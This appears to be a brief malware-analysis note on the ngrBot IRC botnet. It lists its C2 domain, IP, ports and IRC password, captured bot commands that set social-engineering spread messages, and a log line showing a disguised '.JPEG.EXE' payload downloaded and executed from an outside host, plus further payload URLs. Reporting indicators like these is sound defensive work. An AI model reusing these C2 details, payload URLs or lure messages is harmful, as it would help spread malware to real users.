Looks like ngrBot, the reptile mod made by fubar and jam3s, is spreading a lot.
Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]
Remote Host        Port Number
184.107.143.126    2009 and 6667 (PASS ngrBot)
213.251.170.52     80
70.85.227.66       80
PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo 😀 http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira 😀 bajalo 😀 http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"
* The data identified by the following URLs was then requested from the remote web server:
  o http://api.wipmania.com/
  o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
  o http://www.befordsouthpointford.com/bfam/llllllllll.EXE
Crypter used to protect the bot (debug symbol path):
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb
Detection:
2/41 on VirusTotal
Hosting info:
http://whois.domaintools.com/184.107.143.126